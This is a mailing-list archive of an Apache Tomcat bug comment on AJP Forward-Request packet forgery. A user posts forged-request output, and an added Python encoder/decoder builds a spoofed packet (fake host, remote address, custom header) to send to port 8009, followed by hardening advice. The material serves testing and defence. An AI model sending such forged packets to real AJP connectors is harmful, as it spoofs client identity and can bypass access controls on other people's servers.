tomcat-dev mailing list archives

From bugzi...@apache.org
Subject DO NOT REPLY [Bug 51698] ajp CPing/Forward-Request packet forgery, is a design decision? or a security vulnerability?
Date Fri, 02 Sep 2011 10:35:50 GMT
https://issues.apache.org/bugzilla/show_bug.cgi?id=51698

--- Comment #3 from Edward Quick <edwardquick@hotmail.com> 2011-09-02 10:35:50 UTC ---
Hi there. I was testing this out to see if my site was vulnerable and got the
following results. I'm not sure, looking at the code comments in
ForwardRequestForgeryExample.java, whether the output below means it's vulnerable
and what exactly that exploited. Could you help me out a bit please?

Thanks,
Ed.

C:>java -cp . ForwardRequestForgeryExample
Sending AJP Forward-Request Packet...
End

$ tail -f catalina.out
Invoke HelloWorldExample.doPost method:
-------------------------------------------
Host: my.evil-site.com
RemoteAddr: 1.2.3.4
LocalPort: 999
woo: I am here

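Added example, not Edward's ForwardRequestForgeryExample.java and not Tomcat's own code: a small Python encoder/decoder for the AJP13 Forward-Request and CPing packets, to show what the catalina.out lines above are made of. The remote address, server name and server port are plain fields of the packet and "woo" is just one more entry in its header list; the container copies all of them into the request because the protocol assumes the sender is a trusted front end (Apache httpd, IIS). The request URI and the Content-Length header are assumptions, since the post does not show them.

```python
"""Minimal AJP13 packet encoder/decoder (added example, not Tomcat's code)."""
import struct

MAGIC_TO_CONTAINER = b"\x12\x34"               # web server -> container
JK_FORWARD_REQUEST, JK_CPING = 0x02, 0x0A      # packet prefix codes
DEFAULT_PACKET_SIZE = 8192                     # Tomcat's default AJP packetSize
METHODS = {"OPTIONS": 1, "GET": 2, "HEAD": 3, "POST": 4, "PUT": 5, "DELETE": 6}
METHOD_NAMES = {v: k for k, v in METHODS.items()}
# Common request headers travel as 2-byte codes 0xA001.. instead of strings.
KNOWN_HEADERS = {n: 0xA001 + i for i, n in enumerate(
    "accept accept-charset accept-encoding accept-language authorization "
    "connection content-type content-length cookie cookie2 host pragma "
    "referer user-agent".split())}
KNOWN_HEADER_NAMES = {v: k for k, v in KNOWN_HEADERS.items()}
ATTR_SECRET, ATTR_ARE_DONE = 0x0C, 0xFF        # 0x0C carries the requiredSecret

def encode_string(s):
    """AJP string: 2-byte length, bytes, NUL; a null string is length 0xFFFF."""
    if s is None:
        return b"\xff\xff"
    data = s.encode("latin-1")
    return struct.pack(">H", len(data)) + data + b"\x00"

def build_forward_request(method, uri, remote_addr, server_name, server_port,
                          headers, remote_host=None, protocol="HTTP/1.1",
                          is_ssl=False, secret=None):
    """Encode a Forward-Request: the sender picks every field the container will
    later report as RemoteAddr, server name and LocalPort, plus all headers."""
    body = bytes([JK_FORWARD_REQUEST, METHODS[method.upper()]])
    body += encode_string(protocol) + encode_string(uri)
    body += encode_string(remote_addr) + encode_string(remote_host)
    body += encode_string(server_name) + struct.pack(">H", server_port)
    body += bytes([1 if is_ssl else 0]) + struct.pack(">H", len(headers))
    for name, value in headers:
        code = KNOWN_HEADERS.get(name.lower())
        body += struct.pack(">H", code) if code else encode_string(name)
        body += encode_string(value)
    if secret is not None:                     # only checked if the connector sets one
        body += bytes([ATTR_SECRET]) + encode_string(secret)
    body += bytes([ATTR_ARE_DONE])
    packet = MAGIC_TO_CONTAINER + struct.pack(">H", len(body)) + body
    if len(packet) > DEFAULT_PACKET_SIZE:
        raise ValueError("request does not fit in one AJP packet")
    return packet

def build_cping():
    """CPing keepalive (prefix 0x0A); a live container answers CPong b'AB\\x00\\x01\\x09'."""
    return MAGIC_TO_CONTAINER + struct.pack(">H", 1) + bytes([JK_CPING])

class _Reader:                                 # cursor over a packet payload
    def __init__(self, buf):
        self.buf, self.pos = buf, 0

    def uint(self, n):                         # big-endian n-byte integer
        self.pos += n
        return int.from_bytes(self.buf[self.pos - n:self.pos], "big")

    def string(self):
        n = self.uint(2)
        if n == 0xFFFF:                        # AJP null string
            return None
        self.pos += n + 1                      # bytes plus the trailing NUL
        return self.buf[self.pos - n - 1:self.pos - 1].decode("latin-1")

def parse_forward_request(packet):
    """Decode a Forward-Request as the container does (header names lowercased)."""
    if packet[:2] != MAGIC_TO_CONTAINER:
        raise ValueError("bad AJP magic")
    r = _Reader(packet[4:4 + int.from_bytes(packet[2:4], "big")])
    if r.uint(1) != JK_FORWARD_REQUEST:
        raise ValueError("not a Forward-Request")
    req = {"method": METHOD_NAMES[r.uint(1)], "protocol": r.string(), "uri": r.string(),
           "remote_addr": r.string(), "remote_host": r.string(), "server_name": r.string(),
           "server_port": r.uint(2), "is_ssl": bool(r.uint(1)), "headers": []}
    for _ in range(r.uint(2)):
        code = r.uint(2)
        if code & 0xFF00 == 0xA000:
            name = KNOWN_HEADER_NAMES[code]
        else:                                  # it was a string length: re-read
            r.pos -= 2
            name = r.string().lower()
        req["headers"].append((name, r.string()))
    while True:                                # attributes run until 0xFF
        code = r.uint(1)
        if code == ATTR_ARE_DONE:
            return req
        if code != ATTR_SECRET:
            raise ValueError("attribute 0x%02x not handled in this example" % code)
        req["secret"] = r.string()

def forged_request():
    """The packet behind the catalina.out excerpt; URI and Content-Length are assumed."""
    return build_forward_request("POST", "/examples/servlets/servlet/HelloWorldExample",
                                 "1.2.3.4", "my.evil-site.com", 999,
                                 [("Host", "my.evil-site.com"), ("woo", "I am here"),
                                  ("Content-Length", "0")])
```

To reproduce the excerpt, open a TCP connection to the AJP connector (port 8009 by default), send forged_request() and read the reply; build_cping() is the one-byte keepalive the subject line mentions, which a running container answers with a CPong. Since every value is under the sender's control by design, the check that matters is who can open that connection: bind the connector to the loopback interface with address="127.0.0.1" or firewall the port, and set requiredSecret on the AJP connector (newer Tomcat versions call it secret). The encoder carries that secret as attribute 0x0C, so you can confirm that a packet built without secret= is refused once the connector has one configured.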

